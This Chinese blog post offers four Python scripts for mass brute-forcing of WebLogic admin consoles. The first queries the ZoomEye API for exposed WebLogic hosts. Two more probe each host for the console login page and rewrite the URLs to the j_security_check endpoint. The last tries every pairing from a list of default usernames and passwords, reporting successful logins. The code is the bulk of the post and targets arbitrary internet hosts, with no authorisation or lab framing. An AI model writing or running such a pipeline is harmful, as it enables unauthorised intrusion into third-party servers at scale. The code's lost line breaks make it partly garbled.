python写批量weblogic爆破脚本
前言:
整理笔记的时候,发现了weblogic的攻击方法。心里打着算盘看看怎么写
个批量的弱口令爆破脚本。得出了以下思路
思路:
1.利用钟馗之眼采集weblogic的网站,将IP写入到txt
2.添加后台路径,判断是否能成功连接,并且没有过滤表里面的错误。写入到txt
3.转换路径,将后台路径转换为表单请求的路径写入到txt
4.判断是账号和密码是否成功
详细思路请参考:https://www.jianshu.com/p/e97b109ace40 (同时也是一份攻击weblogic服务的好文章)
代码:
weblogicpass.py
import requests def zoomeye():
sjian=open('save.txt','w')
sjian.close() data={"username":"钟馗之眼的登录邮箱","password":"钟馗之眼的登录密码"}
url='https://api.zoomeye.org/user/login'
login=requests.post(url=url,json=data)
access_token=login.json()['access_token'] logheaders={'Authorization':'JWT'+' '+access_token}
for x in range(10):
print('[+]page is {}'.format(x))
url2s='https://api.zoomeye.org/host/search?query=app:weblogic&page={}'.format(x)
rest2=requests.get(url=url2s,headers=logheaders)
vd=rest2.json()['matches'][0:]
for q in vd:
sj='IP:',q['ip'],'Port:',q['portinfo']['port'],'App:',q['portinfo']['app']
print(sj)
print(sj,file=open('save.txt','a'))
zoomeye()
weblogicjiexi.py
import requests
import re
def jx():
xj=open('save2.txt','w')
xj.close() error=['','Not Found','不存在','']
ok=[]
headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
kew = open('save.txt', 'r')
for p in kew.readlines():
we = "".join(p.split('\n'))
pow = re.findall('(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d{2}|[1-9]?\d)',we)
for i in pow:
pd = '{}'.format(i).replace('(', '').replace(')', '').replace("'", '').replace(',', '.').replace(' ', '')
try:
rsc=requests.get(url='http://{}/console/login/LoginForm.jsp'.format(pd),headers=headers,timeout=1.1)
for e in error:
if rsc.status_code==200 and rsc.text not in e:
ok.append(rsc.url) except: pass id = list(set(ok))
for p in id:
lk=re.findall('.*/console/login/LoginForm.jsp',p)
for i in lk:
print('[+]ok url:',i+'')
print(i+'',file=open('save2.txt','a')) jx()
weblogiczhuanhuan.py
import os
import re rl=open('save3.txt','w')
rl.close() if os.path.exists('save2.txt'):
print('[+]ok save2.txt !')
else:
print('[-]Not found save2.txt')
exit() yw=open('save2.txt','r')
for e in yw.readlines():
w="".join(e.split('\n'))
yd=re.sub('/console/login/LoginForm.jsp','/console/j_security_check',w)
print(yd)
print(yd,file=open('save3.txt','a'))
weblogicbaopo.py
import requests
import threading def main(ip):
datas={}
listd=['weblogic','weblogic','weblogic','welcomel','system','password','admin','security','mary','password','joe','password','wlcsystem','wlcsystem','wlpisystem','wlpisystem','weblogic','admin','weblogic','','admin','']
url='{}'.format(ip)
headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}
for user in listd:
for passwd in listd:
data='j_username={}&j_password={}&j_character_encoding=UTF-8'.format(user,passwd)
for j in data.split('&'):
key,value=j.split('=',1)
datas[key]=value
try:
request=requests.post(url=url,headers=headers,data=datas,allow_redirects=False)
if request.status_code==302 and 'console' in request.headers['Location'] and 'LoginForm.jsp' not in request.headers['Location']:
print('[+]url:{}'.format(request.url))
print('[+]username:{}'.format(user))
print('[+]password:{}'.format(passwd))
else:
print('[-]url:{}'.format(request.url))
print('[-]Error username:{}'.format(user))
print('[-]Error password:{}'.format(passwd))
except:
pass if __name__ == '__main__':
we=open('save3.txt','r')
for w in we.readlines():
x="".join(w.split('\n'))
main(x)
测试
正在爆破某个IP的截图:
python写批量weblogic爆破脚本的更多相关文章
- Python Telnet弱口令爆破脚本及遇到的错误与问题
写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住.然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has ...
- python写一个邮箱伪造脚本
前言: 原本打算学php MVC的思路然后写一个项目.但是贼恶心, 写不出来.然后就还是用python写了个邮箱伪造. 0x01 第一步先去搜狐注册一个邮箱 然后,点开设置,开启SMTP服务. 当然你 ...
- python写的自动签到脚本。
等以后有时间补上. 附上代码: #! /usr/bin/env python # coding:utf-8 #-----------------------------------------学号和密 ...
- python+paramiko库+svn写的自动化部署脚本
第一篇博文 直接开门见山的说了. 这是件什么事?:每次部署都是复制本地的文件粘贴到服务器端,因为路径复杂,所以费时且手工容易出漏洞. 一直在想有什么办法可以解决这种,因为以前在微软的一个牛人同事做过一 ...
- python 写的http后台弱口令爆破工具
今天来弄一个后台破解的Python小程序,哈哈,直接上代码吧,都有注释~~ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ...
- Python操作Excel_随机点菜脚本
背景: 中午快餐,菜单吃了个遍,天天纠结于不知道点啥菜. 想起读书考试时,丢纸团选答案,于是用python写个随机点菜脚本玩玩. 功能: 菜单为Excel,一个Sheet ...
- Python写网络后台脚本
Python写网络后台脚本. 首先安装Python3.6.5,在centos中自带的Python是2.6版本的,现在早就出现了3.6版本了况且2和3 之间的差距还是比较大的,所以我选择更新一下Pyth ...
- 「懒惰的美德」我用 python 写了个自动生成给文档生成索引的脚本
我用 python 写了一个自动生成索引的脚本 简介:为了刷算法题,建了一个 GitHub仓库:PiperLiu / ACMOI_Journey,记录自己的刷题轨迹,并总结一下方法.心得.想到一个需求 ...
- Python 写了一个批量生成文件夹和批量重命名的工具
Python 写了一个批量生成文件夹和批量重命名的工具 目录 Python 写了一个批量生成文件夹和批量重命名的工具 演示 功能 1. 可以读取excel内容,使用excel单元格内容进行新建文件夹, ...
随机推荐
- I.MX6 计算iomux Pin配置
/********************************************************************************* * I.MX6 计算iomux P ...
- I.MX6 Linux Qt 启动流程跟踪
/************************************************************************** * I.MX6 Linux Qt 启动流程跟踪 ...
- mysql-python安装时mysql_config not found
在安装 mysql-python时,会出现: sh: mysql_config: not found Traceback (most recent call last): File "s ...
- 1050. 螺旋矩阵(25) pat乙级题
本题要求将给定的N个正整数按非递增的顺序,填入“螺旋矩阵”.所谓“螺旋矩阵”,是指从左上角第1个格子开始,按顺时针螺旋方向填充.要求矩阵的规模为m行n列,满足条件:m*n等于N:m>=n:且m- ...
- Mac无法上网
今天mac突然无法上网了, 家里的大部分设备, 都出现了重启后无法上网的问题, 猜测可能是dns有问题了. 于是乎, 在mac中添加了如下DNS 114.114.114.114 8.8.8.8 1.1 ...
- 各种CTF的WP
http://l-team.org/archives/43.html PlaidCTF-2014-twenty/mtpox/doge_stege-Writeup http://l-team.org/a ...
- 【HAOI2016】食物链
HA真是弱…… 原题: 1.食物链[问题描述]如图所示为某生态系统的食物网示意图,据图回答第1小题. 1.数一数,在这个食物网中有几条食物链( )现在给你n个物种和m条能量流动关系,求其中的食物链条数 ...
- 关于 Vue 方法前面的美元符号
关于 Vue 方法前面的美元符号 学到这一段,不明白什么意思,然后手贱把 $ 删除了,出现未定义方法. vm.$watch('counter', function(nval, oval) { aler ...
- .csv 和 .xls 的区别
.csv 和 .xls 的区别 .csv .xls 较为通用,易导入至各式表格.资料库等 Microsoft excel的专用档案 文本档案,用记事本就可以打开 二进位档案,只有用excel才能打开 ...
- Spring本质-AOP
一.我们在做系统设计的时候,一个非常重要的工作就是把一个大系统做分解, 按业务功能分解成一个个低耦合.高内聚的模块,就像这样: 但是分解以后就会发现有些很有趣的东西, 这些东西是通用的,或者是跨越多个 ...